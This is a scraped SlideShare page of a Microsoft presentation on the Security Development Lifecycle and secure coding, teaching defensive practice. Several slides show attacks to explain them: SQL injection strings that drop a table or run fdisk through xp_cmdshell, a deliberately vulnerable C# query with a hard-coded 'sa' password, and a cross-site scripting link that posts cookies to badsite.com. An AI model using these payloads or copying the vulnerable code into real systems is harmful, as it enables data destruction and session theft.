SlideShare a Scribd company logo

Security Best Practices

Download as PPTX, PDF
Clint Edmonson
Clint Edmonson

Overview of the Microsoft Security Development Lifecycle and industry best practices for secure software development.

1 of 79
Downloaded 234 times
Security Best PracticesClint EdmonsonArchitect EvangelistMicrosoft Corporationclinted@microsoft.com
Security Best Practices
Security Best Practices
Security Best Practices
Security Best Practices
AgendaMicrosoft Security Development LifecycleSecure Design PrinciplesClint’s Dirty Dozen
Microsoft Security Development Lifecycle (SDL)Executive commitment SDL a mandatory policy at Microsoft since 2004EducationAccountabilityTechnology and ProcessOngoing Process Improvements  6 month cycle
Security auditSecurity pushSDL Product Development TimelineSecurity sign-offcriteria determinedThreatanalysisSecure questionsduring interviewsLearn & RefineExternal reviewConceptDesignsCompleteTest plansCompleteCodeCompleteShipPostShipTeam membertrainingReview old defects Check-ins checkedSecure coding guidelinesUse toolsData mutation& Least PrivTestsSWIReview
SDL Activities
SDL Maturity Levels
SDL Secure Design PrinciplesCore SDL secure design principles:Attack Surface ReductionBasic PrivacyThreat ModelingDefense in DepthLeast PrivilegeSecure Defaults
SDL Core Principle: Attack Surface ReductionAttack Surface:Any part of an application that is accessible by a human or another programEach one of these can be potentially exploited by a malicious userAttack Surface Reduction:Minimize the number of exposed attack surface points a malicious user can discover and attempt to exploit
Attack Surface Example
Attack Surface AnalysisNetwork inputs/outputsFile inputs/ outputsEtc.Authenticated or non-authenticated
Administrative or user-level access
Network or local
UDP or TCP
Etc.Attack Surface Analysis TipsIterative process, for all features you need to also analyze their sub-features Restrict access to features as much as possible
It’s Not Just About Turning Things Off
Attack Surface Reduction Examples
SDL Core Principle: Basic PrivacySecurity versus PrivacySecurity: Establishing protective measures that defend against hostile acts or influences and protects the confidentiality of personal informationPrivacy: Empowering users to control the use, collection and distribution of their personal informationSecurity AND Privacy together are key factors to trustworthy computing
Important Note: Security Does Not Always Guarantee PrivacyIt is possible to have a secure system that does not preserve users’ privacy.Authentication vs. AuthorizationVerify who areVerify what they can access
Understanding Privacy Behaviors and Concerns
Microsoft Privacy Guidelines for Developing Products and ServicesDocumented requirements and recommendations for privacy-compliant products and servicesAvailable online for downloadMicrosoft customers will be empowered to control the collection, use, and distribution of their personal information
SDL Core Principle: Threat ModelingThreat Modeling: A process to understand threats to an applicationThreats and vulnerabilitiesThreats: Actions a malicious user may attempt in order to compromise a systemVulnerabilities: A specific way a threat is exploitable, such as a coding error
Threat Modeling In a NutshellProductDevelopment
Microsoft Threat Modeling ToolMicrosoft has published the threat modeling tool and it uses internally to assess threats against products and servicesFreely available online for download
SDL Core Principle: Defense In DepthDefense in Depth: If one defense layer is breached, what other defense layers (if any) provide additional protection to the application?Assume that software and/or hardware will fail at some pointMost applications today can be compromised when a single, and often only, layer of defense is breached (firewall)
Defense in Depth Example
Defense HotspotsSource: http://shapingsoftware.com/2009/03/09/security-hot-spots/
SDL Core Principle: Least PrivilegeAssume that all applications can and will be compromisedLeast Privilege: If an application is compromised, then the potential damage that the malicious person can inflict is contained and minimized accordingly
Least Privilege ExampleLOCAL SYSTEMNON-ADMINADMIN / SYSTEM LEVEL Read user files
Change system passwords
Download malicious files
AnythingNON-ADMINRead user files
Change system passwords
Download malicious files
Limited capabilitiesLeast Privilege TipsEvaluate your application and think minimally!What is the minimum access level your application requires to perform its functions?Elevate privileges only when needed, and then release those elevated privileges when their purposes have been satisfied
SDL Core Principle: Secure DefaultsSecure Defaults: Deploy applications in more secure configurations by default.Helps to better ensure that customers get safer experience with your application out of the box, not after extensive configurationIt is up to the user to reduce security and privacy levels
Secure Defaults Examples
Clint’s Dirty DozenClient-side enforcement of server-side securityImproper input validationClear transmission of sensitive informationFailure to preserve SQL query integrityCross-site request forgery (HTML output integrity)Error message information leak
Clint’s Dirty Dozen File or path name leakingCritical state data exposureImproper access control (authorization)Use of broken or risky cryptography algorithmsHard-coded passwordsExecution with unnecessary privilegesFailure to constrain operations within memory buffers (buffer overrun)(a concern in unmanaged languages)
ConclusionSafer applications begin with secure planning and designSDL Core principles:Attack Surface ReductionBasic PrivacyThreat ModelingDefense in DepthLeast PrivilegeSecure Defaults
Questions?
More Info
Microsoft Security Development Lifecycle (SDL)SDL Book:http://www.microsoft.com/mspress/books/8753.aspxOfficial SDL Web Site: http://www.microsoft.com/sdl
Threat Modeling ResourcesThreat Modeling Book:http://www.microsoft.com/mspress/books/6892.aspxThreat Modeling Tool:http://www.microsoft.com/downloads/details.aspx?FamilyID=62830f95-0e61-4f87-88a6-e7c663444ac1&displaylang=en
Microsoft Developer Network (MSDN) Security Developer CenterOfficial Web site: http://msdn.microsoft.com/security
Secure Development BlogsThe Microsoft Security Development Lifecycle (SDL) Blog: http://blogs.msdn.com/sdlMichael Howard’s Blog: http://blogs.msdn.com/michael_howardJ.D. Meier’s Security Hotspots: http://shapingsoftware.com/2009/03/09/security-hot-spotsSANS Institute Top 25 Most Dangerous Programming Errors: http://www.sans.org/top25errors
Clint EdmonsonArchitect EvangelistMicrosoft Corporationclinted@microsoft.comSlides available at:http://www.notsotrivial.net/slides
© 2002 Microsoft Corporation. All rights reserved.This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
Appendix
Secure Design TenetsReduce Attack SurfaceDefense in DepthLeast PrivilegeSecure Defaults Learn from Past MistakesSecurity is a FeatureProvide Application Diversity
Reducing Attack SurfaceLess code running by default = less stuff to whack by defaultSlammer/CodeRed would not have happened if the features were not on by defaultILoveYou (etc.) would not have happened if scripting was offRequires less admin skillReduces the urgency to deploy security fixesUsability often means “automatically”
Input Trust Issues“All input is evil, until proven otherwise!”The root of most vulnerabilitiesBuffer OverrunsCanonicalization issuesCross-site Scripting (XSS) attacksSQL Injection attacks Good guys give you well-formed data, bad guys don’t!Don’t rely on your client application providing clean dataDon’t assume attackers play by the rulesThey go ‘under the radar’
Buffer OverrunsBeen around foreverPrimarily a C/C++ issueProgramming close to the metal!Prime example of Sloppy Programming!Aim is to change the flow of execution so attacker’s code is calledLack of diversity helps the attackerChapter 5
Buffer Overruns at WorkBuffersOther varsArgsEBPEIPHigher addressesvoid foo(char *p, int i) { int j = 0; CFoo foo; int (*fp)(int) = &func; char b[16];}
Buffer Overruns at WorkBuffersOther varsArgsEBPEIPFunction return addressHigher addresses0wn3d!Exception handlersFunction pointersVirtual methodsAll determineexecution flow
Buffer Overrun ResultsIf you’re lucky, you get an AVDenial of Service against serversIf you’re unlucky, you get instabilityBest of luck debugging that one!If you’re really unlucky, the attacker injects code into your processAnd executes it
Buffer Overrun ExamplesIndex Server ISAPI Application (CodeRed)// cchAttribute is char count of user inputWCHAR wcsAttribute[200];if ( cchAttribute >= sizeof wcsAttribute) THROW( CException( DB_E_ERRORSINCOMMAND ) );DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute, wcsAttribute,webServer.CodePage()); ...void DecodeURLEscapes( BYTE * pIn, ULONG & l, WCHAR * pOut, ULONG ulCodePage ) { WCHAR * p2 = pOut; ULONG l2 = l; ... for( ; l2; l2-- ) {// write to p2 based on pIn, up to l2 bytes
Buffer Overrun ExamplesIndex Server ISAPI Application (CodeRed)// cchAttribute is char count of user inputWCHAR wcsAttribute[200];if ( cchAttribute >= sizeof wcsAttribute / sizeof WCHAR) THROW( CException( DB_E_ERRORSINCOMMAND ) );DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute, wcsAttribute,webServer.CodePage()); ...void DecodeURLEscapes( BYTE * pIn, ULONG & l, WCHAR * pOut, ULONG ulCodePage ) { WCHAR * p2 = pOut; ULONG l2 = l; ... for( ; l2; l2-- ) {// write to p2 based on pIn, up to l2 bytesFIXED!
Using strncpyNaïve use of strncpy is no fixMay not null-terminate the stringShell version, StrCpyN and Windows lstrcpy do, howeverPerformance issuesThird argsizeof mix-upsOff-by-one errorsTotal size of destination bufferConsider strsafe.h/ntstrsafe.hIn Platform SDK, MSDN and VS.NET 2003
The VC++ /GS FlagA VC++.NET compile-time option that adds run-time code to certain functionsUnmanaged C/C++A random value called a ‘cookie’ inserted into stackValidates various stack data is not corruptMost of Windows Server 2003 and VS.NET is compiled with this optionWindowsXP SP2 Minimal perf hit – 4 instructions!
What /GS is NOTA PanaceaA cure for lazy developers!Crap code + /GS == crap code!Only catches some stack-smashing attacksNo heap protectionIt’s an insurance policy
Fixing Buffer OverrunsTrace data coming in from the ‘outside’Watch for data as it moves from untrusted to trusted boundariesBuild approp test plans using data mutationBe wary of certain functionsstrcpy, CopyMemory, MultiByteToWideCharsprintf(…,”%s”,…)Refer to Writing Secure Code 2nd Edition for listAPI which use byte vs. char countsNo such thing as ‘bad functions’ only ‘bad developers’Not limited to copy functionsCompile with /GSWindows Server 2003 on AMD Opteron™ adds /noexecute boot option
Canonicalization IssuesNever make a decision based on the name of a fileChances are good that you’ll get it wrongOften, there is more than one way to name something
The Same File!MySecretFile.txtMySecretFile.txt.MySecr~1.txtMySecretFile.txt::$DATA
The Same URL!http://www.foo.comhttp://www%2efoo%2ecomhttp://www%252efoo%2ecomhttp://172.43.122.12http://2888530444
İ// Do not allow "FILE://" URLsif(url.ToUpper().Left(4) == "FILE") return ERROR;getStuff(url);// Only allow "HTTP://" URLsif(url.ToUpper(CULTURE_INVARIANT).Left(4) == "HTTP") getStuff(url);else return ERROR; The Turkish-I problem(Applies also to Azerbaijan!)Turkish has four letter ‘I’si (U+0069) ı (U+0131) İ (U+0130) I (U+0049)In Turkish locale UC("file")==FİLE
SQL Injection – C#string Status = "No";string sqlstring ="";try { SqlConnection sql= new SqlConnection( @"data source=localhost;" + "user id=sa;password=password;"); sql.Open(); sqlstring="SELECT HasShipped" + " FROM detail WHERE ID='" + Id + "'"; SqlCommand cmd = new SqlCommand(sqlstring,sql); if ((int)cmd.ExecuteScalar() != 0) Status = "Yes";} catch (SqlException se) { Status = sqlstring + " failed\n\r"; foreach (SqlError e in se.Errors) {Status += e.Message + "\n\r";}} catch (Exception e) { Status = e.ToString();}
Good GuyID: 1001SELECT HasShippedFROM detail WHERE ID='1001'Not so Good GuyID: 1001' or 1=1 --SELECT HasShippedFROM detail WHERE ID= '1001' or 1=1 -- 'Why It’s Wrong(1 of 2)
Really Bad GuyID: 1001‘; drop table orders --SELECT HasShipped FROM detailWHERE ID= '1001‘; drop table orders -- 'Downright Evil GuyID: 1001’; exec xp_cmdshell(‘fdisk.exe’) --SELECT HasShipped FROM detailWHERE ID= ‘1001’; exec xp_cmdshell('fdisk.exe') -- 'Why It’s Wrong(2 of 2)
Cross Site ScriptingVery common vulnerabilityThe Nov01 Passport issue was CSSA flaw in a server that leads to compromise in a clientThe fault is simply echoing user input!And trusting user input!
CSS In ActionOwns badsite.comWelcome.aspHello,<%= request.querystring(‘name’)%>
CSS In Action <a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>>here</a>
Input RemediesAll input is evil until proven otherwiseRequire authenticated connectionsSanitize all inputLook for valid dataReject everything elseHigh-level languages can use RegExpSSN = ^\d{3}-\d{2}-\d{4}$Make no assumptions about the trustworthiness of dataNever directly echo Web-based user inputVerify input, then echo itAt the very least, HTML or URL encode the outputASP.NET adds the ValidateRequest optionUse SQL parameterized queries
Storing SecretsStoring secrets securely in software is impossible!…But you can raise the bar!Embedded ‘secrets’ don’t stay secretfor long
Storing SecretsDPAPI is the recommended methodCrypt[Un]ProtectDataRequires Windows 2000 and laterPreferable to LSA secretsEasy!You store the encrypted secretYou can back the data upDPAPI provides integrity checkNo need to run as adminAccount that encrypts the data, decrypts the data
Storing Secrets in MemoryProcessAcquire dataEncrypt it Decrypt itUse itScrub itFunctionsCrypt[Un]ProtectMemoryRequires Windows Server 2003 and laterRtl[En|De]cryptMemoryNow in PlatformSDKSecureZeroMemory
Ad

Recommended

Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And Analysis
Lalit Kale
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and Tools
Yulian Slobodyan
 
7 Steps to Threat Modeling
7 Steps to Threat Modeling7 Steps to Threat Modeling
7 Steps to Threat Modeling
Danny Wong
 
Arved sandstrom - the rotwithin - atlseccon2011
Arved sandstrom - the rotwithin - atlseccon2011Arved sandstrom - the rotwithin - atlseccon2011
Arved sandstrom - the rotwithin - atlseccon2011
Atlantic Security Conference
 
Threat Modeling Everything
Threat Modeling EverythingThreat Modeling Everything
Threat Modeling Everything
Anne Oikarinen
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
Marco Morana
 
Introduction to threat_modeling
Introduction to threat_modelingIntroduction to threat_modeling
Introduction to threat_modeling
Prabath Siriwardena
 
Null bachav
Null bachavNull bachav
Null bachav
Naga Venkata Sunil Alamuri
 
Secure Coding and Threat Modeling
Secure Coding and Threat ModelingSecure Coding and Threat Modeling
Secure Coding and Threat Modeling
Miriam Celi, CISSP, GISP, MSCS, MBA
 
Security Development Lifecycle Tools
Security Development Lifecycle ToolsSecurity Development Lifecycle Tools
Security Development Lifecycle Tools
n|u - The Open Security Community
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Abdul Wahid
 
STRIDE And DREAD
STRIDE And DREADSTRIDE And DREAD
STRIDE And DREAD
chuckbt
 
CSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoatCSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoat
Surachai Chatchalermpun
 
Scalable threat modelling with risk patterns
Scalable threat modelling with risk patternsScalable threat modelling with risk patterns
Scalable threat modelling with risk patterns
Stephen de Vries
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert Hurlbut
DevSecCon
 
Threat modelling(system + enterprise)
Threat modelling(system + enterprise)Threat modelling(system + enterprise)
Threat modelling(system + enterprise)
abhimanyubhogwan
 
Mobile application security and threat modeling
Mobile application security and threat modelingMobile application security and threat modeling
Mobile application security and threat modeling
Shantanu Mitra
 
"CERT Secure Coding Standards" by Dr. Mark Sherman
"CERT Secure Coding Standards" by Dr. Mark Sherman"CERT Secure Coding Standards" by Dr. Mark Sherman
"CERT Secure Coding Standards" by Dr. Mark Sherman
Rinaldi Rampen
 
Csslp
CsslpCsslp
Csslp
Sushil Shakya
 
Software Security Testing
Software Security TestingSoftware Security Testing
Software Security Testing
ankitmehta21
 
Developing a Threat Modeling Mindset
Developing a Threat Modeling MindsetDeveloping a Threat Modeling Mindset
Developing a Threat Modeling Mindset
Robert Hurlbut
 
TUD CS4105 | 2015 | Lecture 1
TUD CS4105 | 2015 | Lecture 1TUD CS4105 | 2015 | Lecture 1
TUD CS4105 | 2015 | Lecture 1
Eelco Visser
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
Lalit Kale
 
Application Security Architecture and Threat Modelling
Application Security Architecture and Threat ModellingApplication Security Architecture and Threat Modelling
Application Security Architecture and Threat Modelling
Priyanka Aash
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
Threat Modeling: Best Practices
Threat Modeling: Best PracticesThreat Modeling: Best Practices
Threat Modeling: Best Practices
Source Conference
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By Example
NCC Group
 
Threat modelling with_sample_application
Threat modelling with_sample_applicationThreat modelling with_sample_application
Threat modelling with_sample_application
Umut IŞIK
 
Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016
Kannan Ganapathy
 
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
FFRI, Inc.
 
Ad

More Related Content

What's hot (20)

Secure Coding and Threat Modeling
Secure Coding and Threat ModelingSecure Coding and Threat Modeling
Secure Coding and Threat Modeling
Miriam Celi, CISSP, GISP, MSCS, MBA
 
Security Development Lifecycle Tools
Security Development Lifecycle ToolsSecurity Development Lifecycle Tools
Security Development Lifecycle Tools
n|u - The Open Security Community
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Abdul Wahid
 
STRIDE And DREAD
STRIDE And DREADSTRIDE And DREAD
STRIDE And DREAD
chuckbt
 
CSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoatCSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoat
Surachai Chatchalermpun
 
Scalable threat modelling with risk patterns
Scalable threat modelling with risk patternsScalable threat modelling with risk patterns
Scalable threat modelling with risk patterns
Stephen de Vries
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert Hurlbut
DevSecCon
 
Threat modelling(system + enterprise)
Threat modelling(system + enterprise)Threat modelling(system + enterprise)
Threat modelling(system + enterprise)
abhimanyubhogwan
 
Mobile application security and threat modeling
Mobile application security and threat modelingMobile application security and threat modeling
Mobile application security and threat modeling
Shantanu Mitra
 
"CERT Secure Coding Standards" by Dr. Mark Sherman
"CERT Secure Coding Standards" by Dr. Mark Sherman"CERT Secure Coding Standards" by Dr. Mark Sherman
"CERT Secure Coding Standards" by Dr. Mark Sherman
Rinaldi Rampen
 
Csslp
CsslpCsslp
Csslp
Sushil Shakya
 
Software Security Testing
Software Security TestingSoftware Security Testing
Software Security Testing
ankitmehta21
 
Developing a Threat Modeling Mindset
Developing a Threat Modeling MindsetDeveloping a Threat Modeling Mindset
Developing a Threat Modeling Mindset
Robert Hurlbut
 
TUD CS4105 | 2015 | Lecture 1
TUD CS4105 | 2015 | Lecture 1TUD CS4105 | 2015 | Lecture 1
TUD CS4105 | 2015 | Lecture 1
Eelco Visser
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
Lalit Kale
 
Application Security Architecture and Threat Modelling
Application Security Architecture and Threat ModellingApplication Security Architecture and Threat Modelling
Application Security Architecture and Threat Modelling
Priyanka Aash
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
Threat Modeling: Best Practices
Threat Modeling: Best PracticesThreat Modeling: Best Practices
Threat Modeling: Best Practices
Source Conference
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By Example
NCC Group
 
Threat modelling with_sample_application
Threat modelling with_sample_applicationThreat modelling with_sample_application
Threat modelling with_sample_application
Umut IŞIK
 
Secure Coding and Threat Modeling
Secure Coding and Threat ModelingSecure Coding and Threat Modeling
Secure Coding and Threat Modeling
Miriam Celi, CISSP, GISP, MSCS, MBA
 
Security Development Lifecycle Tools
Security Development Lifecycle ToolsSecurity Development Lifecycle Tools
Security Development Lifecycle Tools
n|u - The Open Security Community
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Abdul Wahid
 
STRIDE And DREAD
STRIDE And DREADSTRIDE And DREAD
STRIDE And DREAD
chuckbt
 
CSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoatCSSLP & OWASP & WebGoat
CSSLP & OWASP & WebGoat
Surachai Chatchalermpun
 
Scalable threat modelling with risk patterns
Scalable threat modelling with risk patternsScalable threat modelling with risk patterns
Scalable threat modelling with risk patterns
Stephen de Vries
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert Hurlbut
DevSecCon
 
Threat modelling(system + enterprise)
Threat modelling(system + enterprise)Threat modelling(system + enterprise)
Threat modelling(system + enterprise)
abhimanyubhogwan
 
Mobile application security and threat modeling
Mobile application security and threat modelingMobile application security and threat modeling
Mobile application security and threat modeling
Shantanu Mitra
 
"CERT Secure Coding Standards" by Dr. Mark Sherman
"CERT Secure Coding Standards" by Dr. Mark Sherman"CERT Secure Coding Standards" by Dr. Mark Sherman
"CERT Secure Coding Standards" by Dr. Mark Sherman
Rinaldi Rampen
 
Csslp
CsslpCsslp
Csslp
Sushil Shakya
 
Software Security Testing
Software Security TestingSoftware Security Testing
Software Security Testing
ankitmehta21
 
Developing a Threat Modeling Mindset
Developing a Threat Modeling MindsetDeveloping a Threat Modeling Mindset
Developing a Threat Modeling Mindset
Robert Hurlbut
 
TUD CS4105 | 2015 | Lecture 1
TUD CS4105 | 2015 | Lecture 1TUD CS4105 | 2015 | Lecture 1
TUD CS4105 | 2015 | Lecture 1
Eelco Visser
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
Lalit Kale
 
Application Security Architecture and Threat Modelling
Application Security Architecture and Threat ModellingApplication Security Architecture and Threat Modelling
Application Security Architecture and Threat Modelling
Priyanka Aash
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
Threat Modeling: Best Practices
Threat Modeling: Best PracticesThreat Modeling: Best Practices
Threat Modeling: Best Practices
Source Conference
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By Example
NCC Group
 
Threat modelling with_sample_application
Threat modelling with_sample_applicationThreat modelling with_sample_application
Threat modelling with_sample_application
Umut IŞIK
 

Viewers also liked (12)

Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016
Kannan Ganapathy
 
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
FFRI, Inc.
 
Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016
Rihab Chebbah
 
Application Security Program Management with Vulnerability Manager
Application Security Program Management with Vulnerability ManagerApplication Security Program Management with Vulnerability Manager
Application Security Program Management with Vulnerability Manager
Denim Group
 
Vulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDCVulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDC
Denim Group
 
Security best practices
Security best practicesSecurity best practices
Security best practices
AVEVA
 
Intro to Security in SDLC
Intro to Security in SDLCIntro to Security in SDLC
Intro to Security in SDLC
Tjylen Veselyj
 
Agile & Secure SDLC
Agile & Secure SDLCAgile & Secure SDLC
Agile & Secure SDLC
Paul Yang
 
API Security and Management Best Practices
API Security and Management Best PracticesAPI Security and Management Best Practices
API Security and Management Best Practices
CA API Management
 
Roadmap to IT Security Best Practices
Roadmap to IT Security Best PracticesRoadmap to IT Security Best Practices
Roadmap to IT Security Best Practices
Greenway Health
 
Agile and Secure SDLC
Agile and Secure SDLCAgile and Secure SDLC
Agile and Secure SDLC
Nazar Tymoshyk, CEH, Ph.D.
 
Security Management Practices
Security Management PracticesSecurity Management Practices
Security Management Practices
amiable_indian
 
Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016
Kannan Ganapathy
 
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
An Example of use the Threat Modeling Tool (FFRI Monthly Research Nov 2016)
FFRI, Inc.
 
Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016Microsoft threat modeling tool 2016
Microsoft threat modeling tool 2016
Rihab Chebbah
 
Application Security Program Management with Vulnerability Manager
Application Security Program Management with Vulnerability ManagerApplication Security Program Management with Vulnerability Manager
Application Security Program Management with Vulnerability Manager
Denim Group
 
Vulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDCVulnerability Management In An Application Security World: AppSecDC
Vulnerability Management In An Application Security World: AppSecDC
Denim Group
 
Security best practices
Security best practicesSecurity best practices
Security best practices
AVEVA
 
Intro to Security in SDLC
Intro to Security in SDLCIntro to Security in SDLC
Intro to Security in SDLC
Tjylen Veselyj
 
Agile & Secure SDLC
Agile & Secure SDLCAgile & Secure SDLC
Agile & Secure SDLC
Paul Yang
 
API Security and Management Best Practices
API Security and Management Best PracticesAPI Security and Management Best Practices
API Security and Management Best Practices
CA API Management
 
Roadmap to IT Security Best Practices
Roadmap to IT Security Best PracticesRoadmap to IT Security Best Practices
Roadmap to IT Security Best Practices
Greenway Health
 
Agile and Secure SDLC
Agile and Secure SDLCAgile and Secure SDLC
Agile and Secure SDLC
Nazar Tymoshyk, CEH, Ph.D.
 
Security Management Practices
Security Management PracticesSecurity Management Practices
Security Management Practices
amiable_indian
 
Ad

Similar to Security Best Practices (20)

Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
iotcloudserve_tein
 
656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...
656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...
656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...
mahadikamol123
 
Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture
Priyanka Aash
 
SDL: Secure design principles
SDL: Secure design principlesSDL: Secure design principles
SDL: Secure design principles
sluge
 
An Introduction to Secure Application Development
An Introduction to Secure Application DevelopmentAn Introduction to Secure Application Development
An Introduction to Secure Application Development
Christopher Frenz
 
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptxtas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
Mostafa Taghizade
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Process
phanleson
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure software
Leigh Honeywell
 
[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principles[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principles
OWASP
 
Chapter 2- Software Security FULL SLIDES.ppt
Chapter 2- Software Security FULL SLIDES.pptChapter 2- Software Security FULL SLIDES.ppt
Chapter 2- Software Security FULL SLIDES.ppt
Lina Shimelis
 
Software Security Engineering
Software Security EngineeringSoftware Security Engineering
Software Security Engineering
Marco Morana
 
Software Security in the Real World
Software Security in the Real WorldSoftware Security in the Real World
Software Security in the Real World
Mark Curphey
 
Microsoft Security Development Lifecycle
Microsoft Security Development LifecycleMicrosoft Security Development Lifecycle
Microsoft Security Development Lifecycle
Razi Rais
 
Using Third Party Components for Building an Application Might be More Danger...
Using Third Party Components for Building an Application Might be More Danger...Using Third Party Components for Building an Application Might be More Danger...
Using Third Party Components for Building an Application Might be More Danger...
Achim D. Brucker
 
AMI Security 101 - Smart Grid Security East 2011
AMI Security 101 - Smart Grid Security East 2011AMI Security 101 - Smart Grid Security East 2011
AMI Security 101 - Smart Grid Security East 2011
dma1965
 
Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martinAppsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martin
drewz lin
 
Introduction to Application Security Testing
Introduction to Application Security TestingIntroduction to Application Security Testing
Introduction to Application Security Testing
Mohamed Ridha CHEBBI, CISSP
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
DefCamp
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Cenzic
 
Fendley how secure is your e learning
Fendley how secure is your e learningFendley how secure is your e learning
Fendley how secure is your e learning
Bryan Fendley
 
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
